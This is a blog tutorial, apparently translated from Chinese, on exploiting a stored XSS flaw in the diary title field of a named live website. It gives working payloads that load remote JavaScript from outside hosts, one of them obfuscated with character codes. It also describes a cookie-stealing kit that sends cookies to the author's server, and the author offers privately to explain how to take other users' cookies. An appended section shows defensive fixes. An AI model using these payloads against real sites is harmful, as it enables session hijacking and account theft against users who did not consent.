XSS Vulnerability Exploitation Example

Source: Internet
Author: User


The previous article covered the principle of XSS, so you should now have some understanding of how it works. Today let's share a worked example of exploiting XSS.


Environment:

One Windows 7 64-bit machine

Firefox browser

One internet-facing cloud server (I bought it myself ...)

One site that is vulnerable to XSS

One set of JS code for getting cookies

That is everything that needs to be prepared. If you have no internet-facing cloud server (public IP), you can search Baidu for an open XSS platform and work out how to use it yourself (my server is not public; it is too weak and is only used for experiments, so it cannot be made public ...)


Now let's go through the XSS exploitation step by step.


0x00 .... Biubiubiu .... Coming across a site that can be XSSed

(The site is named openly here so that students can test and learn on their own. Please do not cause damage, so that you do not go "from XSS beginner to the police station".)

# You need to register an account; the XSS point is in the Write Diary section: http://www.vbao100.com/


0x01 Start testing for a possible XSS (the normal line of thinking)

# Classic test code

<script>alert(1)</script>

# Stealthy test code (the output has to be viewed in the Firefox plugin Firebug; because it is hidden, it is harder for the administrator to notice than a pop-up window)

console.log(1)


0x02 Ah ah ah ... a pop-up window (XSS confirmed)

Insert the test code in the diary title and click Preview (do not publish ... published entries are reviewed by the admin).



0x03 XSS confirmed ... it can be exploited ... hey hey hey ....

Here again are the XSS payloads mentioned last time:

<script src='http://b.ioio.pub/xss/probe.js'></script>

<svg onload=s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js>

<svg onload=eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,47,120,115,115,47,112,114,111,98,101,46,106,115))>

When any one of the tags above is triggered, it loads JS code from the remote server; you can then achieve different functions by modifying the remote JS code.

As everyone can see, the link above is certainly not mine .... The JS code for getting the cookie comes from an expert.

Share:

https://github.com/evilcos/xssprobe

It mainly contains three files. Here I will only say what each of the three scripts is used for, without going into what the code means.

The first one:

This script is the JS code that is loaded remotely to get the cookie (it can be downloaded to your own server or to an XSS platform). One place needs to be modified: http_server = " # this needs to be changed to the address of your own server and the PHP file that receives the data

The second one:

This is the PHP file mentioned above that receives the data. This file does not need to be modified. Its job is to write the received data to the third file.

The third one:

This is where the cookies are displayed after they have been obtained. The first file gets the cookie, and the second file then writes it into this file.

0x04 Start exploiting ... construct the exploit code

<script src='http://xx.xx.xx.xx/xsstest.js'/> (xx.xx.xx.xx is my cloud server)

Constructed and tested successfully .... I tested with the account I registered myself .... (How to get someone else's cookie depends on your own thinking; if you want, send me a private message and I will tell you ....)

OK ... now let's take a look ....



Now we have successfully obtained my own cookie .... O (∩_∩) o~

(Again, students, please do not cause damage; this is for testing only ...)
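The defensive counterpart to the walkthrough above, as an added example that is not part of the original post: encoding the diary title on output, response headers that keep the session cookie out of script reach and refuse off-origin scripts, and an audit pass over titles already stored that expands `String.fromCharCode(...)` before judging them. The function names, the `SESSION` cookie name and the sample titles used with it are assumptions constructed for illustration.

```javascript
// Added example, not code from the original post. Function names, the cookie
// name and any sample titles are assumptions constructed for illustration.
const ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the diary title for an HTML text or quoted-attribute context, so a
// stored <script> or <svg onload=...> is displayed as text and never parsed.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESC[ch]);
}

function renderDiaryTitle(title) {
  return `<h1 class="diary-title">${escapeHtml(title)}</h1>`;
}

// Headers that limit the damage if an encoding step is missed elsewhere:
// the CSP refuses inline handlers and off-origin scripts, and HttpOnly hides
// the session cookie from document.cookie.
function responseHeaders(sessionId) {
  if (!/^[A-Za-z0-9_-]+$/.test(sessionId)) throw new Error('bad session id');
  return {
    'Content-Security-Policy': "default-src 'self'; script-src 'self'; object-src 'none'",
    'Set-Cookie': `SESSION=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// Audit titles already in the database. String.fromCharCode(...) lists are
// expanded first so an encoded loader is judged by what it decodes to.
function auditStoredTitle(title) {
  const decoded = title.replace(/String\.fromCharCode\s*\(([\d\s,]+)\)/g,
    (_, list) => String.fromCharCode(
      ...list.replace(/\s+/g, '').split(',').map(Number)));
  const findings = [];
  if (/<\s*script\b/i.test(decoded)) findings.push('script-tag');
  if (/<[^>]*\bon[a-z]+\s*=/i.test(decoded)) findings.push('event-handler');
  if (/\bsrc\s*=\s*['"]?\s*(https?:)?\/\//i.test(decoded)) findings.push('remote-src');
  if (decoded !== title) findings.push('charcode-obfuscation');
  return { decoded, findings };
}
```

The audit is a triage aid for entries stored before the fix; the output encoding is what closes the injection point.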

This article is from the "Creative Pilgrim" blog, so be sure to keep this source http://dearch.blog.51cto.com/10423918/1827201
